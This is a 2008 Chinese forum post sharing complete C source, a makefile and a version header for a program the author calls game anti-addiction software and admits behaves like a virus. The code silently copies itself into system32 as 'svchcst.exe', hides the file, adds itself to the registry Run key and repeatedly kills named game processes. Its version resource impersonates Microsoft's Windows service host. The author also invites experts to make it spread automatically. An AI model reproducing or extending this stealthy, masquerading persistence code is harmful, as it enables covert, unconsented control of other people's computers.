前去評論:http://topic.csdn.net/u/20080315/14/e6ca9321-09c0-40c7-9661-9ed1a25be17f.html
朋友總用我的電腦打遊戲,我就寫了個這東西,嘿嘿
希望有高手能把這東西做成病毒,讓它自動傳播,已減少遊戲危害。
注意:軟體行為類似病毒,運作無界面,無任何提示,需手動删除。
說明:
遊戲防沉迷軟體
完成時間:2008年3月15日
運作平台:win32
編譯環境:devc++ windowsxp-sp2
連接配接庫:libpsapi.lib
功能描述:開機啟動,監測程序,清除程序以防止指定程式啟動。
執行後系統改動:
1:建立檔案C:/WINDOWS/system32/svchcst.exe(系統+隐藏屬性)
3:添加系統資料庫項Software/Microsoft/Windows/CurrentVersion/Run
主鍵:SuQiEr
鍵值:C:/WINDOWS/system32/svchcst.exe
程式流程較長的描述:
啟動程式
if(檔案所在位置不為C:/WINDOWS/system32/svchcst.exe)
{
複制檔案到C:/WINDOWS/system32/svchcst.exe
修改檔案C:/WINDOWS/system32/svchcst.exe屬性為隐藏+系統
寫入系統資料庫,以實作開機自動啟動svchcst.exe
}
STRKILL:掃描程序,查找指定程序名并傳回該程序pid
結束指定程序,程式停止1800秒,跳轉至STRKILL
---------------makefile:
# Project: svchcst
# Makefile created by Dev-C++ 4.9.9.2
CPP = g++.exe
CC = gcc.exe
WINDRES = windres.exe
RES = kill_private.res
OBJ = main.o $(RES)
LINKOBJ = main.o $(RES)
LIBS = -L"d:/Dev-Cpp/lib" -mwindows D:/Dev-Cpp/lib/libpsapi.a -fmessage-length=0
INCS = -I"d:/Dev-Cpp/include"
CXXINCS = -I"d:/Dev-Cpp/lib/gcc/mingw32/3.4.2/include" -I"d:/Dev-Cpp/include/c++/3.4.2/backward" -I"d:/Dev-Cpp/include/c++/3.4.2/mingw32" -I"d:/Dev-Cpp/include/c++/3.4.2" -I"d:/Dev-Cpp/include"
BIN = kill.exe
CXXFLAGS = $(CXXINCS) -ansi -fmessage-length=0
CFLAGS = $(INCS) -ansi -fmessage-length=0
RM = rm -f
.PHONY: all all-before all-after clean clean-custom
all: all-before kill.exe all-after
clean: clean-custom
${RM} $(OBJ) $(BIN)
$(BIN): $(OBJ)
$(CC) $(LINKOBJ) -o "kill.exe" $(LIBS)
main.o: main.c
$(CC) -c main.c -o main.o $(CFLAGS)
kill_private.res: kill_private.rc
$(WINDRES) -i kill_private.rc --input-format=rc -o kill_private.res -O coff
----------KILL_PRIVATE_H(版本與版權資訊)
#ifndef KILL_PRIVATE_H
#define KILL_PRIVATE_H
#define VER_STRING "5.1.2600.2180"
#define VER_MAJOR 5
#define VER_MINOR 1
#define VER_RELEASE 2600
#define VER_BUILD 2180
#define COMPANY_NAME "Microsoft Corporation"
#define FILE_VERSION "5.1.2600.2180 (xpsp_sp2_rtm.040803-2158)"
#define FILE_DESCRIPTION "Generic Host Process for Win32 Services"
#define INTERNAL_NAME ""
#define LEGAL_COPYRIGHT "Microsoft Corporation. All rights reserved."
#define LEGAL_TRADEMARKS ""
#define ORIGINAL_FILENAME "svchcst.exe"
#define PRODUCT_NAME "Microsoft Windows Operating System"
#define PRODUCT_VERSION ""
#endif
----------main.c主功能代碼
#include <windows.h>
#include <stdio.h>
#include <PSAPI.H>
#include <time.h>
#define GAMENAME "cs.exe","Wow.exe","war3.exe"
#define PLAYTIME 1800
#define KILLDIR "C://WINDOWS//system32//svchcst.exe"
BOOL RegisterToAutoRun(void)
{
HKEY hKEY;
long ret;
LPSTR FileCurrentExeName = KILLDIR;
DWORD type=REG_SZ;
DWORD size=MAX_PATH;
LPCTSTR lpValueName="SuQiEr",Rgspath="Software//Microsoft//Windows//CurrentVersion//Run";
ret=RegOpenKeyEx(HKEY_LOCAL_MACHINE,Rgspath,0,KEY_WRITE,&hKEY);
if(ret!=ERROR_SUCCESS)
{
RegCloseKey(hKEY);
return 1;
}
ret=RegSetValueEx(hKEY,lpValueName,(DWORD)NULL,type,(CONST BYTE *)FileCurrentExeName,size);
if(ret!=ERROR_SUCCESS)
{
RegCloseKey(hKEY);
return 2;
}
RegCloseKey(hKEY);
return 0;
}
int getSpecifiedProcessId(DWORD pID[],const char* pszProcessName[])
{
DWORD processId[1024], cbNeeded, dwProcessesCount;
HANDLE hProcess;
HMODULE hMod;
UINT i,j,pidcx=0;
char szProcessName[MAX_PATH] = "UnknownProcess";
DWORD dwArrayInBytes = sizeof(processId)*sizeof(DWORD);
if(!EnumProcesses(processId,dwArrayInBytes,&cbNeeded))
return 0;
dwProcessesCount=cbNeeded/sizeof(DWORD);
for(i=0;i <dwProcessesCount;i++)
{
hProcess = OpenProcess(PROCESS_ALL_ACCESS,FALSE,processId[i]);
if(!hProcess)
{
continue;
}
else
{
if(EnumProcessModules(hProcess,&hMod,sizeof(hMod),&cbNeeded))
{
GetModuleBaseName(hProcess,hMod,szProcessName,sizeof(szProcessName));
for(j=0;*pszProcessName[j];j++)
{
if(!_stricmp(szProcessName,pszProcessName[j]))
{
CloseHandle(hProcess);
pID[pidcx++] = processId[i];
break;
}
}
}
}
}
CloseHandle(hProcess);
pID[pidcx++] = 0;
return pidcx;
}
int myCopyFile(void)
{
SHFILEOPSTRUCT Op = {0};
int rettf=0;
char CurrentPath[MAX_PATH+1]= {0};
DWORD size=MAX_PATH;
GetModuleFileName(NULL,CurrentPath,size);
Op.hwnd = NULL;
Op.wFunc = FO_COPY;
Op.pFrom = CurrentPath;
Op.pTo = KILLDIR;
Op.fFlags = FOF_NOCONFIRMATION ¦FOF_SILENT;
rettf = SHFileOperation(&Op);
return rettf;
}
int WINAPI WinMain (HINSTANCE hThisInstance,
HINSTANCE hPrevInstance,
LPSTR lpszArgument,
int nFunsterStil)
{
DWORD pidcx=0;
DWORD pID[MAX_PATH]={0};
const char* pszProcessName[]= {GAMENAME,"/0"};
HANDLE handle1;
char CurrentPath[MAX_PATH]= {0};
DWORD size=MAX_PATH;
int i;
GetModuleFileName(NULL,CurrentPath,size);
if(_stricmp(KILLDIR,CurrentPath))
{
myCopyFile();
SetFileAttributes(KILLDIR,FILE_ATTRIBUTE_SYSTEM ¦FILE_ATTRIBUTE_ARCHIVE ¦FILE_ATTRIBUTE_HIDDEN);
RegisterToAutoRun();
}
while(1)
{
pidcx = getSpecifiedProcessId(pID,pszProcessName);
for(i=0;pID[i];i++)
{
handle1=OpenProcess(PROCESS_TERMINATE,FALSE,pID[i]);
if(handle1)
TerminateProcess(handle1,0);
}
sleep(PLAYTIME*1000);
}
return 0;
}